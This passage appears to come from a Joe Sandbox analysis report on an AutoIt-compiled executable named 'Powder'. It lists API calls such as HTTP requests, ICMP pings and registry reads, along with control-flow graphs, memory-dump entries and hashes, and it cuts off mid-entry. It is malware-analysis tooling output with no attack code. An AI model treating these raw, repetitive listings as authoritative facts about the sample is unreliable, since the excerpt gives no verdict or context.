                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: a8bcd22bdef571ba5fb913c7ff40467deaec6cddc9376444dc90b54af46fb3c7
                                                  • Instruction ID: 6fef5f9f642ed5218bef890c9d88d2397a353555d9b7d66c3302124c5d484f58
                                                  • Opcode Fuzzy Hash: a8bcd22bdef571ba5fb913c7ff40467deaec6cddc9376444dc90b54af46fb3c7
                                                  • Instruction Fuzzy Hash: 92313CB28443199FDB409FA5DC89ACDBBF0FF09320F10456BE590B62A0D7B5054ACF91

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E03444
                                                  • RegisterClassExW.USER32(00000030), ref: 00E0346E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0347F
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00E0349C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E034AC
                                                  • LoadIconW.USER32(000000A9), ref: 00E034C2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E034D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 586029a3b5b3683548a5ea7b7c225b426acc28d190a0fe3490626a6a2ea6f922
                                                  • Instruction ID: 7f53ddc85371ce5fb83796b8c0bc0b696c082a42b5cf05928f0805fbed5a638a
                                                  • Opcode Fuzzy Hash: 586029a3b5b3683548a5ea7b7c225b426acc28d190a0fe3490626a6a2ea6f922
                                                  • Instruction Fuzzy Hash: 9721E7B2914319AFDB409F96EC49B9D7BF4FB08710F40411BF650B62A0D7B21549CF91

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00E200CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E13094), ref: 00E200ED
                                                    • Part of subcall function 00E208C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E1309F), ref: 00E208E3
                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E130E2
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E501BA
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E501FB
                                                  • RegCloseKey.ADVAPI32(?), ref: 00E50239
                                                  • _wcscat.LIBCMT ref: 00E50292
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: ac828dad5c8e583c69629e8180ccd40ffdb101b356f11452eb58b37fe0856d03
                                                  • Instruction ID: 5258c41fbd15512946df21ddcdd512acfd92d186bc790822dfc60271e9efe12c
                                                  • Opcode Fuzzy Hash: ac828dad5c8e583c69629e8180ccd40ffdb101b356f11452eb58b37fe0856d03
                                                  • Instruction Fuzzy Hash: 93715C715057119EC708EF26EA45DABBBE8FF84340F40292EF545A22B1EF319989CB52

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E15156
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00E15165
                                                  • LoadIconW.USER32(00000063), ref: 00E1517C
                                                  • LoadIconW.USER32(000000A4), ref: 00E1518E
                                                  • LoadIconW.USER32(000000A2), ref: 00E151A0
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E151C6
                                                  • RegisterClassExW.USER32(?), ref: 00E1521C
                                                    • Part of subcall function 00E03411: GetSysColorBrush.USER32(0000000F), ref: 00E03444
                                                    • Part of subcall function 00E03411: RegisterClassExW.USER32(00000030), ref: 00E0346E
                                                    • Part of subcall function 00E03411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0347F
                                                    • Part of subcall function 00E03411: InitCommonControlsEx.COMCTL32(?), ref: 00E0349C
                                                    • Part of subcall function 00E03411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E034AC
                                                    • Part of subcall function 00E03411: LoadIconW.USER32(000000A9), ref: 00E034C2
                                                    • Part of subcall function 00E03411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E034D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 7db39475322aa599173633a017e175bf09883263e97b4733819ef8e0dcfa8813
                                                  • Instruction ID: 4db612c1e82311082b9788200b4134b8227b7c55bee0ded8387b8689227185cf
                                                  • Opcode Fuzzy Hash: 7db39475322aa599173633a017e175bf09883263e97b4733819ef8e0dcfa8813
                                                  • Instruction Fuzzy Hash: 942148B1A04308AFEB149FAAED09F9D7BB4FB48320F00012AF544B62B0D7B655598F84

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 925 e75e1d-e75e54 call e04dc0 928 e75e56-e75e63 call e0502b 925->928 929 e75e74-e75e86 WSAStartup 925->929 928->929 938 e75e65-e75e70 call e0502b 928->938 930 e75e9d-e75edb call e140cd call e04d37 call e1402a inet_addr gethostbyname 929->930 931 e75e88-e75e98 call e57135 929->931 946 e75edd-e75eea IcmpCreateFile 930->946 947 e75eec-e75efc call e57135 930->947 939 e75ff6-e75ffe 931->939 938->929 946->947 948 e75f01-e75f32 call e20fe6 call e1433f 946->948 953 e75fed-e75ff1 call e11cb6 947->953 957 e75f55-e75f69 IcmpSendEcho 948->957 958 e75f34-e75f53 IcmpSendEcho 948->958 953->939 959 e75f6d-e75f6f 957->959 958->959 960 e75fa2-e75fa4 959->960 961 e75f71-e75f76 959->961 964 e75fa6-e75fb2 call e57135 960->964 962 e75fba-e75fcc call e04dc0 961->962 963 e75f78-e75f7d 961->963 973 e75fd2 962->973 974 e75fce-e75fd0 962->974 966 e75fb4-e75fb8 963->966 967 e75f7f-e75f84 963->967 972 e75fd4-e75fe8 IcmpCloseHandle WSACleanup call e145ae 964->972 966->964 967->960 971 e75f86-e75f8b 967->971 975 e75f8d-e75f92 971->975 976 e75f9a-e75fa0 971->976 972->953 973->972 974->972 975->966 978 e75f94-e75f98 975->978 976->964 978->964
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00E75E7E
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00E75EC3
                                                  • gethostbyname.WS2_32(?), ref: 00E75ECF
                                                  • IcmpCreateFile.IPHLPAPI ref: 00E75EDD
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75F4D
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75F63
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E75FD8
                                                  • WSACleanup.WSOCK32 ref: 00E75FDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 429bf64bbee6265233475a887f1ead98e5cefbf46e67a6aa7d6f34a31fa679dd
                                                  • Instruction ID: 0e22da0be17f79d64a2bd6dd803db4dbf3f43dcff090f7c0df5a749cb55e3cc8
                                                  • Opcode Fuzzy Hash: 429bf64bbee6265233475a887f1ead98e5cefbf46e67a6aa7d6f34a31fa679dd
                                                  • Instruction Fuzzy Hash: C351B0326046019FD720EF25CD45B6AB7E0EF48714F14991AF999FB2E1DBB0E944CB42

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 979 e14d83-e14dd1 981 e14e31-e14e33 979->981 982 e14dd3-e14dd6 979->982 981->982 983 e14e35 981->983 984 e14e37 982->984 985 e14dd8-e14ddf 982->985 986 e14e1a-e14e22 DefWindowProcW 983->986 987 e509c2-e509f0 call e0c460 call e0c483 984->987 988 e14e3d-e14e40 984->988 989 e14de5-e14dea 985->989 990 e14ead-e14eb5 PostQuitMessage 985->990 994 e14e28-e14e2e 986->994 1023 e509f5-e509fc 987->1023 996 e14e42-e14e43 988->996 997 e14e65-e14e8c SetTimer RegisterWindowMessageW 988->997 991 e50a35-e50a49 call e62cce 989->991 992 e14df0-e14df2 989->992 995 e14e61-e14e63 990->995 991->995 1015 e50a4f 991->1015 998 e14eb7-e14ec1 call e15b29 992->998 999 e14df8-e14dfd 992->999 995->994 1003 e50965-e50968 996->1003 1004 e14e49-e14e5c KillTimer call e15ac3 call e034e4 996->1004 997->995 1000 e14e8e-e14e99 CreatePopupMenu 997->1000 1017 e14ec6 998->1017 1005 e14e03-e14e08 999->1005 1006 e50a1a-e50a21 999->1006 1000->995 1010 e5099e-e509bd MoveWindow 1003->1010 1011 e5096a-e5096c 1003->1011 1004->995 1013 e14e9b-e14eab call e15bd7 1005->1013 1014 e14e0e-e14e14 1005->1014 1006->986 1021 e50a27-e50a30 call e58854 1006->1021 1010->995 1018 e5098d-e50999 SetFocus 1011->1018 1019 e5096e-e50971 1011->1019 1013->995 1014->986 1014->1023 1015->986 1017->995 1018->995 1019->1014 1024 e50977-e50988 call e0c460 1019->1024 1021->986 1023->986 1029 e50a02-e50a15 call e15ac3 call e159d3 1023->1029 1024->995 1029->986
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00E14E22
                                                  • KillTimer.USER32(?,00000001), ref: 00E14E4C
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E14E6F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E14E7A
                                                  • CreatePopupMenu.USER32 ref: 00E14E8E
                                                  • PostQuitMessage.USER32(00000000), ref: 00E14EAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: aa07fd7d9871ee80fb1c452f4e88a6c26bbd5a434652b590282aba21d810ec78
                                                  • Instruction ID: 7c142ce7f13896ee011988746b3d4caa148bb3e62c4e482dc0e6f64c92d991ad
                                                  • Opcode Fuzzy Hash: aa07fd7d9871ee80fb1c452f4e88a6c26bbd5a434652b590282aba21d810ec78
                                                  • Instruction Fuzzy Hash: 56413CF2208205AFDB195F649D09FFE3695F780305F00252AF941B93E1CB729CD99B61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1120 e720e1-e720f9 1121 e72104-e72126 InternetConnectW 1120->1121 1122 e720fb-e72101 1120->1122 1123 e7213c-e72152 HttpOpenRequestW 1121->1123 1124 e72128-e72137 call e72b4f 1121->1124 1122->1121 1126 e72154-e7215c 1123->1126 1127 e72161-e72165 1123->1127 1136 e7222b-e72231 1124->1136 1129 e72215 1126->1129 1130 e72167-e7216b call e72b86 1127->1130 1131 e72170-e72177 1127->1131 1132 e72217 call e72b4f 1129->1132 1130->1131 1134 e721a5-e721b4 HttpSendRequestW 1131->1134 1135 e72179-e7219f InternetQueryOptionW InternetSetOptionW 1131->1135 1140 e7221c-e72220 1132->1140 1138 e721b6-e721c1 call e720a0 1134->1138 1139 e7220d-e72213 1134->1139 1135->1134 1138->1139 1145 e721c3-e721fd HttpQueryInfoW call e237c3 1138->1145 1139->1129 1142 e72222-e72223 InternetCloseHandle 1140->1142 1143 e72229 1140->1143 1142->1143 1143->1136 1148 e72207-e7220b 1145->1148 1149 e721ff-e72205 call e729ba 1145->1149 1148->1132 1149->1140
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E7211C
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E72148
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E7218A
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E7219F
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E721AC
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E721DC
                                                  • InternetCloseHandle.WININET(00000000), ref: 00E72223
                                                    • Part of subcall function 00E72B4F: GetLastError.KERNEL32(?,?,00E71EE3,00000000,00000000,00000001), ref: 00E72B64
                                                    • Part of subcall function 00E72B4F: SetEvent.KERNEL32(?,?,00E71EE3,00000000,00000000,00000001), ref: 00E72B79
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 2603140658-3916222277
                                                  • Opcode ID: 7c866dc717bc12b155255ed5b6ce369d24eef59c120c5ec8f9ede6050430eede
                                                  • Instruction ID: 138c1a44095ea000ea44ecdaf5be649cf0c04249935f8ed1f6e2195e37d68c0d
                                                  • Opcode Fuzzy Hash: 7c866dc717bc12b155255ed5b6ce369d24eef59c120c5ec8f9ede6050430eede
                                                  • Instruction Fuzzy Hash: 29414DB1501218BEEB129F51DC85FBB7BACFF08354F00911BFA19AA152D770DE459BA0

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E50C5B
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  • _memset.LIBCMT ref: 00E15787
                                                  • _wcscpy.LIBCMT ref: 00E157DB
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E157EB
                                                  • __swprintf.LIBCMT ref: 00E50CD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                  • String ID: Line %d: $,z$AutoIt -
                                                  • API String ID: 230667853-3046949335
                                                  • Opcode ID: e1016201fe6726c04fdaa87dbf03b5323239eb5655cbec80e73329afa992626c
                                                  • Instruction ID: dc83504c4f14e8632e9ef1bb9259860ba3bffb8e7050910ae106afb44b872c54
                                                  • Opcode Fuzzy Hash: e1016201fe6726c04fdaa87dbf03b5323239eb5655cbec80e73329afa992626c
                                                  • Instruction Fuzzy Hash: 0141A6B1008300AEC325EB60DC45EDFB7DCAF84354F101A1EF595B21A2DB709689CB96

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1305 e150db-e1514b CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E15109
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E1512A
                                                  • ShowWindow.USER32(00000000), ref: 00E1513E
                                                  • ShowWindow.USER32(00000000), ref: 00E15147
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: ce967d2af396b2b7a2047649d2ce50725c169867675c10893953f5961153dda6
                                                  • Instruction ID: d136fd33d7f73e6753ddc60775e4d46d660cd7d1300e8146cd28c48a161a9d4e
                                                  • Opcode Fuzzy Hash: ce967d2af396b2b7a2047649d2ce50725c169867675c10893953f5961153dda6
                                                  • Instruction Fuzzy Hash: 24F0DAB15452947EEA351767AC49E272E7DD7C6F60F00012AB940B21B0C6A61856DEB0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1306 e69b16-e69b9b call e14a8c call e69cf1 1311 e69ba5-e69c5c call e14ab2 * 4 call e14a8c call e2593c * 2 call e14ab2 call e696c4 call e68f0e 1306->1311 1312 e69b9d 1306->1312 1335 e69c73-e69c77 1311->1335 1336 e69c5e-e69c6e call e22f85 * 2 1311->1336 1313 e69b9f-e69ba0 1312->1313 1315 e69ce8-e69cee 1313->1315 1338 e69cd8-e69cde call e22f85 1335->1338 1339 e69c79-e69cd1 call e690c1 call e22f85 1335->1339 1336->1313 1347 e69ce0-e69ce6 1338->1347 1349 e69cd6 1339->1349 1347->1315 1349->1347
                                                  APIs
                                                    • Part of subcall function 00E14A8C: _fseek.LIBCMT ref: 00E14AA4
                                                    • Part of subcall function 00E69CF1: _wcscmp.LIBCMT ref: 00E69DE1
                                                    • Part of subcall function 00E69CF1: _wcscmp.LIBCMT ref: 00E69DF4
                                                  • _free.LIBCMT ref: 00E69C5F
                                                  • _free.LIBCMT ref: 00E69C66
                                                  • _free.LIBCMT ref: 00E69CD1
                                                    • Part of subcall function 00E22F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29C54,00000000,00E28D5D,00E259C3), ref: 00E22F99
                                                    • Part of subcall function 00E22F85: GetLastError.KERNEL32(00000000,?,00E29C54,00000000,00E28D5D,00E259C3), ref: 00E22FAB
                                                  • _free.LIBCMT ref: 00E69CD9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                  • API String ID: 1552873950-2806939583
                                                  • Opcode ID: 0010f0009c31970662b4374649c677de9514f91a4f9e1ed852f482644a317b30
                                                  • Instruction ID: da901fcc8af58a8f48bf9cd266f996e5fd40e228ec916cec2762c26bcd29d724
                                                  • Opcode Fuzzy Hash: 0010f0009c31970662b4374649c677de9514f91a4f9e1ed852f482644a317b30
                                                  • Instruction Fuzzy Hash: 95513CB1A44219AFDF249F64DC41AAEBBB9FF48304F00109EB259B3381DB715A80CF59
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                  • Instruction ID: 470771d652cfeab87759194da40312f79e79ea1c9f4383f766d4df645593ad97
                                                  • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                  • Instruction Fuzzy Hash: D551B632A00B25DBDB248F69EA846AE77B5EF40324F24972AF835B62D0D7709D509F40
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E052E6
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E0534A
                                                  • TranslateMessage.USER32(?), ref: 00E05356
                                                  • DispatchMessageW.USER32(?), ref: 00E05360
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Message$Peek$DispatchTranslate
                                                  • String ID:
                                                  • API String ID: 1795658109-0
                                                  • Opcode ID: 1e17e10f56ede4406849b571d8c87c96e531908e0d3cb670e3b94ee58bde15da
                                                  • Instruction ID: 4596ee653dd5e2d6fe59a4276ad5d3ea605b5f894d62376a678a96bda0c387ad
                                                  • Opcode Fuzzy Hash: 1e17e10f56ede4406849b571d8c87c96e531908e0d3cb670e3b94ee58bde15da
                                                  • Instruction Fuzzy Hash: F031E5325087069FDB308BA59C48FFB3BE89B01348F14246AE552B61E5D7BA98C9DF11
                                                  APIs
                                                    • Part of subcall function 00E1FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E84186,00000001,00E90980), ref: 00E1FFA7
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E0AD08
                                                  • OleInitialize.OLE32(00000000), ref: 00E0AD85
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E42F56
                                                  Strings
                                                  Memory Dump Source
